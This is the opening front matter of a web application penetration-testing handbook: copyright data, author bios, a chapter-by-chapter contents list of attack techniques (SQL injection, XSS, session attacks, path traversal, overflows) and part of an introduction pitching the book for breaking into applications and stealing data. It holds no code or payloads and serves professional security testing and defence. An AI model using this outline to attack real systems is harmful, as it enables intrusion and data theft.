The Web Application Hacker's Handbook: Discovering and

Dafydd Stuttard

Marcus Pinto

The Web Application

Hacker’s Handbook

Discovering and Exploiting Security Flaws

Wiley Publishing, Inc.

70779ffirs.qxd:WileyRed 9/17/07 12:11 PM Page i

70779ffirs.qxd:WileyRed 9/17/07 12:11 PM Page ii

Dafydd Stuttard

Marcus Pinto

The Web Application

Hacker’s Handbook

Discovering and Exploiting Security Flaws

Wiley Publishing, Inc.

70779ffirs.qxd:WileyRed 9/17/07 12:11 PM Page i

The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws

Published by

Wiley Publishing, Inc.

10475 Crosspoint Boulevard

Indianapolis, IN 46256

www.wiley.com

Published by Wiley Publishing, Inc., Indianapolis, Indiana

Published simultaneously in Canada

ISBN: 978-0-470-17077-9

Manufactured in the United States of America

10 9 8 7 6 5 4 3 2 1

No part of this publication may be reproduced, stored in a retrieval system or transmitted in any form

or by any means, electronic, mechanical, photocopying, recording, scanning or otherwise, except as

permitted under Sections 107 or 108 of the 1976 United States Copyright Act, without either the prior

written permission of the Publisher, or authorization through payment of the appropriate per-copy fee

to the Copyright Clearance Center, 222 Rosewood Drive, Danvers, MA 01923, (978) 750-8400, fax (978)

646-8600. Requests to the Publisher for permission should be addressed to the Legal Department, Wiley

Publishing, Inc., 10475 Crosspoint Blvd., Indianapolis, IN 46256, (317) 572-3447, fax (317) 572-4355, or

online at http://www.wiley.com/go/permissions.

Limit of Liability/Disclaimer of Warranty: The publisher and the author make no representations or

warranties with respect to the accuracy or completeness of the contents of this work and specifically

disclaim all warranties, including without limitation warranties of fitness for a particular purpose. No

warranty may be created or extended by sales or promotional materials. The advice and strategies con-

tained herein may not be suitable for every situation. This work is sold with the understanding that the

publisher is not engaged in rendering legal, accounting, or other professional services. If professional

assistance is required, the services of a competent professional person should be sought. Neither the

publisher nor the author shall be liable for damages arising herefrom. The fact that an organization or

Website is referred to in this work as a citation and/or a potential source of further information does

not mean that the author or the publisher endorses the information the organization or Website may

provide or recommendations it may make. Further, readers should be aware that Internet Websites

listed in this work may have changed or disappeared between when this work was written and when

it is read.

For general information on our other products and services or to obtain technical support, please con-

tact our Customer Care Department within the U.S. at (800) 762-2974, outside the U.S. at (317) 572-3993

or fax (317) 572-4002.

Library of Congress Cataloging-in-Publication Data

Stuttard, Dafydd, 1972-

The web application hacker's handbook : discovering and exploiting security flaws / Dafydd Stut-

tard, Marcus Pinto.

p. cm.

Includes index.

ISBN 978-0-470-17077-9 (pbk.)

1. Internet--Security measures. 2. Computer security. I. Pinto, Marcus, 1978- II. Title.

TK5105.875.I57S85 2008

005.8--dc22

2007029983

Trademarks: Wiley and related trade dress are registered trademarks of Wiley Publishing, Inc., in the

United States and other countries, and may not be used without written permission. All other trade-

marks are the property of their respective owners. Wiley Publishing, Inc., is not associated with any

product or vendor mentioned in this book.

Wiley also publishes its books in a variety of electronic formats. Some content that appears in print may

not be available in electronic books.

70779ffirs.qxd:WileyRed 9/17/07 12:11 PM Page ii

iii

Dafydd Stuttard is a Principal Security Consultant at Next Generation Secu-

rity Software, where he leads the web application security competency. He has

nine years’ experience in security consulting and specializes in the penetration

testing of web applications and compiled software.

Dafydd has worked with numerous banks, retailers, and other enterprises

to help secure their web applications, and has provided security consulting to

several software manufacturers and governments to help secure their com-

piled software. Dafydd is an accomplished programmer in several languages,

and his interests include developing tools to facilitate all kinds of software

security testing.

Dafydd has developed and presented training courses at the Black Hat secu-

rity conferences around the world. Under the alias “PortSwigger,” Dafydd cre-

ated the popular Burp Suite of web application hacking tools. Dafydd holds

master’s and doctorate degrees in philosophy from the University of Oxford.

Marcus Pinto is a Principal Security Consultant at Next Generation Security

Software, where he leads the database competency development team, and

has lead the development of NGS’ primary training courses. He has eight

years’ experience in security consulting and specializes in penetration testing

of web applications and supporting architectures.

Marcus has worked with numerous banks, retailers, and other enterprises to

help secure their web applications, and has provided security consulting to the

development projects of several security-critical applications. He has worked

extensively with large-scale web application deployments in the financial ser-

vices industry.

Marcus has developed and presented database and web application train-

ing courses at the Black Hat and other security conferences around the world.

Marcus holds a master’s degree in physics from the University of Cambridge.

About the Authors

70779ffirs.qxd:WileyRed 9/17/07 12:11 PM Page iii

Executive Editor

Carol Long

Development Editor

Adaobi Obi Tulton

Production Editor

Christine O’Connor

Copy Editor

Foxxe Editorial Services

Editorial Manager

Mary Beth Wakefield

Production Manager

Tim Tate

Vice President and Executive Group

Publisher

Richard Swadley

Vice President and Executive Publisher

Joseph B. Wikert

Project Coordinator, Cover

Lynsey Osborn

Compositor

Happenstance Type-O-Rama

Proofreader

Kathryn Duggan

Indexer

Johnna VanHoose Dinse

Anniversary Logo Design

Richard Pacifico

Credits

70779ffirs.qxd:WileyRed 9/17/07 12:11 PM Page iv

Acknowledgments xxiii

Introduction xxv

Chapter 1 Web Application (In)security 1

The Evolution of Web Applications 2

Common Web Application Functions 3

Benefits of Web Applications 4

Web Application Security 5

“This Site Is Secure” 6

The Core Security Problem: Users Can Submit Arbitrary Input 8

Key Problem Factors 9

Immature Security Awareness 9

In-House Development 9

Deceptive Simplicity 9

Rapidly Evolving Threat Profile 10

Resource and Time Constraints 10

Overextended Technologies 10

The New Security Perimeter 10

The Future of Web Application Security 12

Chapter Summary 13

Chapter 2 Core Defense Mechanisms 15

Handling User Access 16

Authentication 16

Session Management 17

Access Control 18

Handling User Input 19

Varieties of Input 20

Approaches to Input Handling 21

Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page v

“Reject Known Bad” 21

“Accept Known Good” 21

Sanitization 22

Safe Data Handling 22

Semantic Checks 23

Boundary Validation 23

Multistep Validation and Canonicalization 26

Handling Attackers 27

Handling Errors 27

Maintaining Audit Logs 29

Alerting Administrators 30

Reacting to Attacks 31

Managing the Application 32

Chapter Summary 33

Questions 34

Chapter 3 Web Application Technologies 35

The HTTP Protocol 35

HTTP Requests 36

HTTP Responses 37

HTTP Methods 38

URLs 40

HTTP Headers 41

General Headers 41

Request Headers 41

Response Headers 42

Cookies 43

Status Codes 44

HTTPS 45

HTTP Proxies 46

HTTP Authentication 47

Web Functionality 47

Server-Side Functionality 48

The Java Platform 49

ASP.NET 50

PHP 50

Client-Side Functionality 51

HTML 51

Hyperlinks 51

Forms 52

JavaScript 54

Thick Client Components 54

State and Sessions 55

Encoding Schemes 56

URL Encoding 56

Unicode Encoding 57

vi Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page vi

HTML Encoding 57

Base64 Encoding 58

Hex Encoding 59

Next Steps 59

Questions 59

Chapter 4 Mapping the Application 61

Enumerating Content and Functionality 62

Web Spidering 62

User-Directed Spidering 65

Discovering Hidden Content 67

Brute-Force Techniques 67

Inference from Published Content 70

Use of Public Information 72

Leveraging the Web Server 75

Application Pages vs. Functional Paths 76

Discovering Hidden Parameters 79

Analyzing the Application 79

Identifying Entry Points for User Input 80

Identifying Server-Side Technologies 82

Banner Grabbing 82

HTTP Fingerprinting 82

File Extensions 84

Directory Names 86

Session Tokens 86

Third-Party Code Components 87

Identifying Server-Side Functionality 88

Dissecting Requests 88

Extrapolating Application Behavior 90

Mapping the Attack Surface 91

Chapter Summary 92

Questions 93

Chapter 5 Bypassing Client-Side Controls 95

Transmitting Data via the Client 95

Hidden Form Fields 96

HTTP Cookies 99

URL Parameters 99

The Referer Header 100

Opaque Data 101

The ASP.NET ViewState 102

Capturing User Data: HTML Forms 106

Length Limits 106

Script-Based Validation 108

Disabled Elements 110

Capturing User Data: Thick-Client Components 111

Java Applets 112

Contents vii

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page vii

Decompiling Java Bytecode 114

Coping with Bytecode Obfuscation 117

ActiveX Controls 119

Reverse Engineering 120

Manipulating Exported Functions 122

Fixing Inputs Processed by Controls 123

Decompiling Managed Code 124

Shockwave Flash Objects 124

Handling Client-Side Data Securely 128

Transmitting Data via the Client 128

Validating Client-Generated Data 129

Logging and Alerting 131

Chapter Summary 131

Questions 132

Chapter 6 Attacking Authentication 133

Authentication Technologies 134

Design Flaws in Authentication Mechanisms 135

Bad Passwords 135

Brute-Forcible Login 136

Verbose Failure Messages 139

Vulnerable Transmission of Credentials 142

Password Change Functionality 144

Forgotten Password Functionality 145

“Remember Me” Functionality 148

User Impersonation Functionality 149

Incomplete Validation of Credentials 152

Non-Unique Usernames 152

Predictable Usernames 154

Predictable Initial Passwords 154

Insecure Distribution of Credentials 155

Implementation Flaws in Authentication 156

Fail-Open Login Mechanisms 156

Defects in Multistage Login Mechanisms 157

Insecure Storage of Credentials 161

Securing Authentication 162

Use Strong Credentials 162

Handle Credentials Secretively 163

Validate Credentials Properly 164

Prevent Information Leakage 166

Prevent Brute-Force Attacks 167

Prevent Misuse of the Password Change Function 170

Prevent Misuse of the Account Recovery Function 170

Log, Monitor, and Notify 172

Chapter Summary 172

viii Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page viii

Chapter 7 Attacking Session Management 175

The Need for State 176

Alternatives to Sessions 178

Weaknesses in Session Token Generation 180

Meaningful Tokens 180

Predictable Tokens 182

Concealed Sequences 184

Time Dependency 185

Weak Random Number Generation 187

Weaknesses in Session Token Handling 191

Disclosure of Tokens on the Network 192

Disclosure of Tokens in Logs 196

Vulnerable Mapping of Tokens to Sessions 198

Vulnerable Session Termination 200

Client Exposure to Token Hijacking 201

Liberal Cookie Scope 203

Cookie Domain Restrictions 203

Cookie Path Restrictions 205

Securing Session Management 206

Generate Strong Tokens 206

Protect Tokens throughout Their Lifecycle 208

Per-Page Tokens 211

Log, Monitor, and Alert 212

Reactive Session Termination 212

Chapter Summary 213

Questions 214

Chapter 8 Attacking Access Controls 217

Common Vulnerabilities 218

Completely Unprotected Functionality 219

Identifier-Based Functions 220

Multistage Functions 222

Static Files 222

Insecure Access Control Methods 223

Attacking Access Controls 224

Securing Access Controls 228

A Multi-Layered Privilege Model 231

Chapter Summary 234

Questions 235

Chapter 9 Injecting Code 237

Injecting into Interpreted Languages 238

Injecting into SQL 240

Exploiting a Basic Vulnerability 241

Bypassing a Login 243

Finding SQL Injection Bugs 244

Injecting into Different Statement Types 247

Contents ix

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page ix

The UNION Operator 251

Fingerprinting the Database 255

Extracting Useful Data 256

An Oracle Hack 257

An MS-SQL Hack 260

Exploiting ODBC Error Messages (MS-SQL Only) 262

Enumerating Table and Column Names 263

Extracting Arbitrary Data 265

Using Recursion 266

Bypassing Filters 267

Second-Order SQL Injection 271

Advanced Exploitation 272

Retrieving Data as Numbers 273

Using an Out-of-Band Channel 274

Using Inference: Conditional Responses 277

Beyond SQL Injection: Escalating the Database Attack 285

MS-SQL 286

Oracle 288

MySQL 288

SQL Syntax and Error Reference 289

SQL Syntax 290

SQL Error Messages 292

Preventing SQL Injection 296

Partially Effective Measures 296

Parameterized Queries 297

Defense in Depth 299

Injecting OS Commands 300

Example 1: Injecting via Perl 300

Example 2: Injecting via ASP 302

Finding OS Command Injection Flaws 304

Preventing OS Command Injection 307

Injecting into Web Scripting Languages 307

Dynamic Execution Vulnerabilities 307

Dynamic Execution in PHP 308

Dynamic Execution in ASP 308

Finding Dynamic Execution Vulnerabilities 309

File Inclusion Vulnerabilities 310

Remote File Inclusion 310

Local File Inclusion 311

Finding File Inclusion Vulnerabilities 312

Preventing Script Injection Vulnerabilities 312

Injecting into SOAP 313

Finding and Exploiting SOAP Injection 315

Preventing SOAP Injection 316

Injecting into XPath 316

Subverting Application Logic 317

x Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page x

Informed XPath Injection 318

Blind XPath Injection 319

Finding XPath Injection Flaws 320

Preventing XPath Injection 321

Injecting into SMTP 321

Email Header Manipulation 322

SMTP Command Injection 323

Finding SMTP Injection Flaws 324

Preventing SMTP Injection 326

Injecting into LDAP 326

Injecting Query Attributes 327

Modifying the Search Filter 328

Finding LDAP Injection Flaws 329

Preventing LDAP Injection 330

Chapter Summary 331

Questions 331

Chapter 10 Exploiting Path Traversal 333

Common Vulnerabilities 333

Finding and Exploiting Path Traversal Vulnerabilities 335

Locating Targets for Attack 335

Detecting Path Traversal Vulnerabilities 336

Circumventing Obstacles to Traversal Attacks 339

Coping with Custom Encoding 342

Exploiting Traversal Vulnerabilities 344

Preventing Path Traversal Vulnerabilities 344

Chapter Summary 346

Questions 346

Chapter 11 Attacking Application Logic 349

The Nature of Logic Flaws 350

Real-World Logic Flaws 350

Example 1: Fooling a Password Change Function 351

The Functionality 351

The Assumption 351

The Attack 352

Example 2: Proceeding to Checkout 352

The Functionality 352

The Assumption 353

The Attack 353

Example 3: Rolling Your Own Insurance 354

The Functionality 354

The Assumption 354

The Attack 355

Example 4: Breaking the Bank 356

The Functionality 356

The Assumption 357

The Attack 358

Contents xi

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xi

Example 5: Erasing an Audit Trail 359

The Functionality 359

The Assumption 359

The Attack 359

Example 6: Beating a Business Limit 360

The Functionality 360

The Assumption 361

The Attack 361

Example 7: Cheating on Bulk Discounts 362

The Functionality 362

The Assumption 362

The Attack 362

Example 8: Escaping from Escaping 363

The Functionality 363

The Assumption 364

The Attack 364

Example 9: Abusing a Search Function 365

The Functionality 365

The Assumption 365

The Attack 365

Example 10: Snarfing Debug Messages 366

The Functionality 366

The Assumption 367

The Attack 367

Example 11: Racing against the Login 368

The Functionality 368

The Assumption 368

The Attack 368

Avoiding Logic Flaws 370

Chapter Summary 372

Questions 372

Chapter 12 Attacking Other Users 375

Cross-Site Scripting 376

Reflected XSS Vulnerabilities 377

Exploiting the Vulnerability 379

Stored XSS Vulnerabilities 383

Storing XSS in Uploaded Files 385

DOM-Based XSS Vulnerabilities 386

Real-World XSS Attacks 388

Chaining XSS and Other Attacks 390

Payloads for XSS Attacks 391

Virtual Defacement 391

Injecting Trojan Functionality 392

Inducing User Actions 394

Exploiting Any Trust Relationships 394

Escalating the Client-Side Attack 396

xii Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xii

Delivery Mechanisms for XSS Attacks 399

Delivering Reflected and DOM-Based XSS Attacks 399

Delivering Stored XSS Attacks 400

Finding and Exploiting XSS Vulnerabilities 401

Finding and Exploiting Reflected XSS Vulnerabilities 402

Finding and Exploiting Stored XSS Vulnerabilities 415

Finding and Exploiting DOM-Based XSS Vulnerabilities 417

HttpOnly Cookies and Cross-Site Tracing 421

Preventing XSS Attacks 423

Preventing Reflected and Stored XSS 423

Preventing DOM-Based XSS 427

Preventing XST 428

Redirection Attacks 428

Finding and Exploiting Redirection Vulnerabilities 429

Circumventing Obstacles to Attack 431

Preventing Redirection Vulnerabilities 433

HTTP Header Injection 434

Exploiting Header Injection Vulnerabilities 434

Injecting Cookies 435

Delivering Other Attacks 436

HTTP Response Splitting 436

Preventing Header Injection Vulnerabilities 438

Frame Injection 438

Exploiting Frame Injection 439

Preventing Frame Injection 440

Request Forgery 440

On-Site Request Forgery 441

Cross-Site Request Forgery 442

Exploiting XSRF Flaws 443

Preventing XSRF Flaws 444

JSON Hijacking 446

JSON 446

Attacks against JSON 447

Overriding the Array Constructor 447

Implementing a Callback Function 448

Finding JSON Hijacking Vulnerabilities 449

Preventing JSON Hijacking 450

Session Fixation 450

Finding and Exploiting Session Fixation Vulnerabilities 452

Preventing Session Fixation Vulnerabilities 453

Attacking ActiveX Controls 454

Finding ActiveX Vulnerabilities 455

Preventing ActiveX Vulnerabilities 456

Local Privacy Attacks 458

Persistent Cookies 458

Cached Web Content 458

Contents xiii

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xiii

Browsing History 459

Autocomplete 460

Preventing Local Privacy Attacks 460

Advanced Exploitation Techniques 461

Leveraging Ajax 461

Making Asynchronous Off-Site Requests 463

Anti-DNS Pinning 464

A Hypothetical Attack 465

DNS Pinning 466

Attacks against DNS Pinning 466

Browser Exploitation Frameworks 467

Chapter Summary 469

Questions 469

Chapter 13 Automating Bespoke Attacks 471

Uses for Bespoke Automation 472

Enumerating Valid Identifiers 473

The Basic Approach 474

Detecting Hits 474

HTTP Status Code 474

Response Length 475

Response Body 475

Location Header 475

Set-cookie Header 475

Time Delays 476

Scripting the Attack 476

JAttack 477

Harvesting Useful Data 484

Fuzzing for Common Vulnerabilities 487

Putting It All Together: Burp Intruder 491

Positioning Payloads 492

Choosing Payloads 493

Configuring Response Analysis 494

Attack 1: Enumerating Identifiers 495

Attack 2: Harvesting Information 498

Attack 3: Application Fuzzing 500

Chapter Summary 502

Questions 502

Chapter 14 Exploiting Information Disclosure 505

Exploiting Error Messages 505

Script Error Messages 506

Stack Traces 507

Informative Debug Messages 508

Server and Database Messages 509

Using Public Information 511

Engineering Informative Error Messages 512

xiv Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xiv

Gathering Published Information 513

Using Inference 514

Preventing Information Leakage 516

Use Generic Error Messages 516

Protect Sensitive Information 517

Minimize Client-Side Information Leakage 517

Chapter Summary 518

Questions 518

Chapter 15 Attacking Compiled Applications 521

Buffer Overflow Vulnerabilities 522

Stack Overflows 522

Heap Overflows 523

“Off-by-One” Vulnerabilities 524

Detecting Buffer Overflow Vulnerabilities 527

Integer Vulnerabilities 529

Integer Overflows 529

Signedness Errors 529

Detecting Integer Vulnerabilities 530

Format String Vulnerabilities 531

Detecting Format String Vulnerabilities 532

Chapter Summary 533

Questions 534

Chapter 16 Attacking Application Architecture 535

Tiered Architectures 535

Attacking Tiered Architectures 536

Exploiting Trust Relationships between Tiers 537

Subverting Other Tiers 538

Attacking Other Tiers 539

Securing Tiered Architectures 540

Minimize Trust Relationships 540

Segregate Different Components 541

Apply Defense in Depth 542

Shared Hosting and Application Service Providers 542

Virtual Hosting 543

Shared Application Services 543

Attacking Shared Environments 544

Attacks against Access Mechanisms 545

Attacks between Applications 546

Securing Shared Environments 549

Secure Customer Access 549

Segregate Customer Functionality 550

Segregate Components in a Shared Application 551

Chapter Summary 551

Questions 551

Contents xv

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xv

Chapter 17 Attacking the Web Server 553

Vulnerable Web Server Configuration 553

Default Credentials 554

Default Content 555

Debug Functionality 555

Sample Functionality 556

Powerful Functions 557

Directory Listings 559

Dangerous HTTP Methods 560

The Web Server as a Proxy 562

Misconfigured Virtual Hosting 564

Securing Web Server Configuration 565

Vulnerable Web Server Software 566

Buffer Overflow Vulnerabilities 566

Microsoft IIS ISAPI Extensions 567

Apache Chunked Encoding Overflow 567

Microsoft IIS WebDav Overflow 567

iPlanet Search Overflow 567

Path Traversal Vulnerabilities 568

Accipiter DirectServer 568

Alibaba 568

Cisco ACS Acme.server 568

McAfee EPolicy Orcestrator 568

Encoding and Canonicalization Vulnerabilities 568

Allaire JRun Directory Listing Vulnerability 569

Microsoft IIS Unicode Path Traversal Vulnerabilities 569

Oracle PL/SQL Exclusion List Bypasses 570

Finding Web Server Flaws 571

Securing Web Server Software 572

Choose Software with a Good Track Record 572

Apply Vendor Patches 572

Perform Security Hardening 573

Monitor for New Vulnerabilities 573

Use Defense-in-Depth 573

Chapter Summary 574

Questions 574

Chapter 18 Finding Vulnerabilities in Source Code 577

Approaches to Code Review 578

Black-Box vs. White-Box Testing 578

Code Review Methodology 579

Signatures of Common Vulnerabilities 580

Cross-Site Scripting 580

SQL Injection 581

Path Traversal 582

Arbitrary Redirection 583

xvi Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xvi

OS Command Injection 584

Backdoor Passwords 584

Native Software Bugs 585

Buffer Overflow Vulnerabilities 585

Integer Vulnerabilities 586

Format String Vulnerabilities 586

Source Code Comments 586

The Java Platform 587

Identifying User-Supplied Data 587

Session Interaction 589

Potentially Dangerous APIs 589

File Access 589

Database Access 590

Dynamic Code Execution 591

OS Command Execution 591

URL Redirection 592

Sockets 592

Configuring the Java Environment 593

ASP.NET 594

Identifying User-Supplied Data 594

Session Interaction 595

Potentially Dangerous APIs 596

File Access 596

Database Access 597

Dynamic Code Execution 598

OS Command Execution 598

URL Redirection 599

Sockets 600

Configuring the ASP.NET Environment 600

PHP 601

Identifying User-Supplied Data 601

Session Interaction 603

Potentially Dangerous APIs 604

File Access 604

Database Access 606

Dynamic Code Execution 607

OS Command Execution 607

URL Redirection 608

Sockets 608

Configuring the PHP Environment 609

Safe Mode 610

Magic Quotes 610

Miscellaneous 611

Perl 611

Identifying User-Supplied Data 612

Contents xvii

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xvii

Session Interaction 613

Potentially Dangerous APIs 613

File Access 613

Database Access 613

Dynamic Code Execution 614

OS Command Execution 614

URL Redirection 615

Sockets 615

Configuring the Perl Environment 615

JavaScript 616

Database Code Components 617

SQL Injection 617

Calls to Dangerous Functions 618

Tools for Code Browsing 619

Chapter Summary 620

Questions 621

Chapter 19 A Web Application Hacker’s Toolkit 623

Web Browsers 624

Internet Explorer 624

Firefox 624

Opera 626

Integrated Testing Suites 627

How the Tools Work 628

Intercepting Proxies 628

Web Application Spiders 633

Application Fuzzers and Scanners 636

Manual Request Tools 637

Feature Comparison 640

Burp Suite 643

Paros 644

WebScarab 645

Alternatives to the Intercepting Proxy 646

Tamper Data 647

TamperIE 647

Vulnerability Scanners 649

Vulnerabilities Detected by Scanners 649

Inherent Limitations of Scanners 651

Every Web Application Is Different 652

Scanners Operate on Syntax 652

Scanners Do Not Improvise 652

Scanners Are Not Intuitive 653

Technical Challenges Faced by Scanners 653

Authentication and Session Handling 653

Dangerous Effects 654

Individuating Functionality 655

Other Challenges to Automation 655

xviii Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xviii

Current Products 656

Using a Vulnerability Scanner 658

Other Tools 659

Nikto 660

Hydra 660

Custom Scripts 661

Wget 662

Curl 662

Netcat 663

Stunnel 663

Chapter Summary 664

Chapter 20 A Web Application Hacker’s Methodology 665

General Guidelines 667

1. Map the Application’s Content 669

1.1. Explore Visible Content 669

1.2. Consult Public Resources 670

1.3. Discover Hidden Content 670

1.4. Discover Default Content 671

1.5. Enumerate Identifier-Specified Functions 671

1.6. Test for Debug Parameters 672

2. Analyze the Application 672

2.1. Identify Functionality 673

2.2. Identify Data Entry Points 673

2.3. Identify the Technologies Used 673

2.4. Map the Attack Surface 674

3. Test Client-Side Controls 675

3.1. Test Transmission of Data via the Client 675

3.2. Test Client-Side Controls over User Input 676

3.3. Test Thick-Client Components 677

3.3.1. Test Java Applets 677

3.3.2. Test ActiveX controls 678

3.3.3. Test Shockwave Flash objects 678

4. Test the Authentication Mechanism 679

4.1. Understand the Mechanism 680

4.2. Test Password Quality 680

4.3. Test for Username Enumeration 680

4.4. Test Resilience to Password Guessing 681

4.5. Test Any Account Recovery Function 682

4.6. Test Any Remember Me Function 682

4.7. Test Any Impersonation Function 683

4.8. Test Username Uniqueness 683

4.9. Test Predictability of Auto-Generated Credentials 684

4.10. Check for Unsafe Transmission of Credentials 684

4.11. Check for Unsafe Distribution of Credentials 685

Contents xix

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xix

4.12. Test for Logic Flaws 685

4.12.1. Test for Fail-Open Conditions 685

4.12.2. Test Any Multistage Mechanisms 686

4.13. Exploit Any Vulnerabilities to Gain Unauthorized Access 687

5. Test the Session Management Mechanism 688

5.1. Understand the Mechanism 689

5.2. Test Tokens for Meaning 689

5.3. Test Tokens for Predictability 690

5.4. Check for Insecure Transmission of Tokens 691

5.5. Check for Disclosure of Tokens in Logs 692

5.6. Check Mapping of Tokens to Sessions 692

5.7. Test Session Termination 693

5.8. Check for Session Fixation 694

5.9. Check for XSRF 694

5.10. Check Cookie Scope 695

6. Test Access Controls 696

6.1. Understand the Access Control Requirements 696

6.2. Testing with Multiple Accounts 697

6.3. Testing with Limited Access 697

6.4. Test for Insecure Access Control Methods 698

7. Test for Input-Based Vulnerabilities 699

7.1. Fuzz All Request Parameters 699

7.2. Test for SQL Injection 702

7.3. Test for XSS and Other Response Injection 704

7.3.1. Identify Reflected Request Parameters 704

7.3.2. Test for Reflected XSS 705

7.3.3. Test for HTTP Header Injection 705

7.3.4. Test for Arbitrary Redirection 706

7.3.5. Test for Stored Attacks 706

7.4. Test for OS Command Injection 707

7.5. Test for Path Traversal 709

7.6. Test for Script Injection 711

7.7. Test for File Inclusion 711

8. Test for Function-Specific Input Vulnerabilities 712

8.1. Test for SMTP Injection 712

8.2. Test for Native Software Vulnerabilities 713

8.2.1. Test for Buffer Overflows 713

8.2.2. Test for Integer Vulnerabilities 714

8.2.3. Test for Format String Vulnerabilities 714

8.3. Test for SOAP Injection 715

8.4. Test for LDAP Injection 715

8.5. Test for XPath Injection 716

9. Test for Logic Flaws 717

9.1. Identify the Key Attack Surface 717

9.2. Test Multistage Processes 718

9.3. Test Handling of Incomplete Input 718

xx Contents

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xx

9.4. Test Trust Boundaries 719

9.5. Test Transaction Logic 719

10. Test for Shared Hosting Vulnerabilities 720

10.1. Test Segregation in Shared Infrastructures 720

10.2. Test Segregation between ASP-Hosted Applications 721

11. Test for Web Server Vulnerabilities 721

11.1. Test for Default Credentials 722

11.2. Test for Default Content 722

11.3. Test for Dangerous HTTP Methods 722

11.4. Test for Proxy Functionality 723

11.5. Test for Virtual Hosting Misconfiguration 723

11.6. Test for Web Server Software Bugs 723

12. Miscellaneous Checks 724

12.1. Check for DOM-Based Attacks 724

12.2. Check for Frame Injection 725

12.3. Check for Local Privacy Vulnerabilities 726

12.4. Follow Up Any Information Leakage 726

12.5. Check for Weak SSL Ciphers 727

Index 729

Contents xxi

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xxi

70779toc.qxd:WileyRed 9/16/07 5:07 PM Page xxii

Our primary debt is to the directors and our other colleagues at Next Genera-

tion Security Software, who have provided a creative working environment,

promoted sharing of knowledge, and supported us during the months spent

producing this book. In particular, we received direct assistance from Chris

Anley, Dave Armstrong, Dominic Beecher, David Litchfield, Adam Matthews,

Dave Spencer, and Peter Winter-Smith.

In addition to our immediate colleagues, we are greatly indebted to the

wider community of researchers who have shared their ideas and contributed

to the collective understanding of web application security issues that exists

today. Because this is a practical handbook rather than a work of scholarship,

we deliberately avoided filling it with a thousand citations of influential arti-

cles, books, and blog postings which spawned the ideas involved. We hope

that people whose work we discuss anonymously are content with the general

credit given here.

We are grateful to the people at Wiley, in particular to Carol Long for enthusi-

astically supporting our project from the outset, to Adaobi Obi Tulton for helping

to polish our manuscript and coaching us in the quirks of “American English,”

and to Christine O’Connor’s team for delivering a first-rate production.

A large measure of thanks is due to our respective partners, Becky and

Susan, for tolerating the significant distraction and time involved in producing

a book of this size.

Both authors are indebted to the people who led us into our unusual line of

work. Dafydd would like to thank Martin Law. Martin is a great guy who first

taught me how to hack, and encouraged me to spend my time developing tech-

niques and tools for attacking applications. Marcus would like to thank his par-

ents for a great many things, a significant one being getting me into computers.

I’ve been getting into computers ever since.

Acknowledgments

xxiii

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxiii

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxiv

This book is a practical guide to discovering and exploiting security flaws in

web applications. By “web application” we mean an application that is accessed

by using a web browser to communicate with a web server. We examine a wide

variety of different technologies, such as databases, file systems, and web ser-

vices, but only in the context in which these are employed by web applications.

If you want to learn how to run port scans, attack firewalls, or break into

servers in other ways, we suggest you look elsewhere. But if you want to know

how to hack into a web application, steal sensitive data, and perform unau-

thorized actions, then this is the book for you. There is enough that is interest-

ing and fun to say on that subject without straying into any other territory.

Overview of This Book

The focus of this book is highly practical. While we include sufficient back-

ground and theory for you to understand the vulnerabilities that web applica-

tions contain, our primary concern is with the tasks and techniques that you

need to master in order to break into them. Throughout the book, we spell out

the specific steps that you need to take to detect each type of vulnerability, and

how to exploit it to perform unauthorized actions. We also include a wealth of

real-world examples, derived from the authors’ many years of experience, illus-

trating how different kinds of security flaw manifest themselves in today’s web

applications.

Security awareness is usually a two-edged sword. Just as application devel-

opers can benefit from understanding the methods used by attackers, hackers

Introduction

xxv

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxv

can gain from knowing how applications can effectively defend themselves. In

addition to describing security vulnerabilities and attack techniques, we also

describe in detail the countermeasures that applications can take to thwart an

attacker. For those of you who perform penetration tests of web applications,

this will enable you to provide high-quality remediation advice to the owners

of the applications you compromise.

Who Should Read This Book

The primary audience for this book is anyone with a personal or professional

interest in attacking web applications. It is also aimed at anyone responsible

for developing and administering web applications — knowing how your

enemy operates will help you to defend against them.

We assume that the reader is familiar with core security concepts, such as

logins and access controls, and has a basic grasp of core web technologies,

such as browsers, web servers, and HTTP. However, any gaps in your current

knowledge of these areas will be easy to remedy, through either the explana-

tions contained within this book or references elsewhere.

In the course of illustrating many categories of security flaws, we provide

code extracts showing how applications can be vulnerable. These examples

are simple enough to be understood without any prior knowledge of the lan-

guage in question but will be most useful if you have some basic experience of

reading or writing code.

How This Book Is Organized

This book is organized roughly in line with the dependencies between the dif-

ferent topics covered. If you are new to web application hacking, you should

read the book through from start to finish, acquiring the knowledge and under-

standing you need to tackle later chapters. If you already have some experience

in this area, you can jump straight into any chapter or subsection that particu-

larly interests you. Where necessary, we have included cross-references to other

chapters, which you can use to fill in any gaps in your understanding.

We begin with three context-setting chapters describing the current state of

web application security and the trends that indicate how it is likely to evolve

in the near future. We examine the core security problem affecting web appli-

cations and the defense mechanisms that applications implement to address

this problem. We also provide a primer in the key technologies used in today’s

web applications.

The bulk of the book is concerned with our core topic — the techniques that

you can use to break into web applications. This material is organized around

xxvi Introduction

70779flast.qxd:WileyRed 9/14/07 3:12 PM Page xxvi

the key tasks that you need to perform to carry out a comprehensive attack:

from mapping the application’s functionality, scrutinizing and attacking its

core defense mechanisms, to probing for specific categories of security flaws.

The book concludes with three chapters that pull together the various

